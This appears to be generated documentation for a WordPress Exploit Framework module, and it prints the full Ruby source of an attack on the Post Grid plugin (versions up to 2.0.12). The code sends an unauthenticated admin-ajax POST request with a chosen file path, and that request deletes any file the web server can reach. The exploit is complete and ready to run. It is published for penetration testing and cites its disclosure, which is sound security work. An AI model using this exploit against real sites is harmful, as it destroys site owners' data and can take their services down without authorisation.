class Wpxf::Auxiliary::PostGridFileDeletion
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb, line 6 def initialize super update_info( name: 'Post Grid <= 2.0.12 Unauthenticated Arbitrary File Deletion', desc: 'This module exploits a vulnerability in versions <= 2.0.12 of '\ 'the Post Grid plugin which allows you to delete any arbitrary '\ 'file accessible by the user the web server is running as.', author: [ 'White Fir Design', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8667'], ['URL', 'https://www.pluginvulnerabilities.com/2016/11/08/file-deletion-vulnerability-in-post-grid/'] ], date: 'Nov 08 2016' ) register_options([ StringOption.new( name: 'remote_file', desc: 'The relative or absolute path of the file to delete (relative to /wp-admin/)', required: true ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb, line 34 def check check_plugin_version_from_readme('post-grid', '2.0.13') end
remote_file()
click to toggle source
# File lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb, line 38 def remote_file normalized_option_value('remote_file') end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb, line 42 def run return false unless super emit_info "Deleting #{remote_file}..." res = execute_post_request( url: wordpress_url_admin_ajax, body: { action: 'post_grid_ajax_remove_export_content_layout', file_url: remote_file } ) if res.nil? || res.timed_out? emit_error 'Request timed out' return false end if res.code != 200 emit_error "Server responded with code #{res.code}" return false end emit_success 'File deleted' true end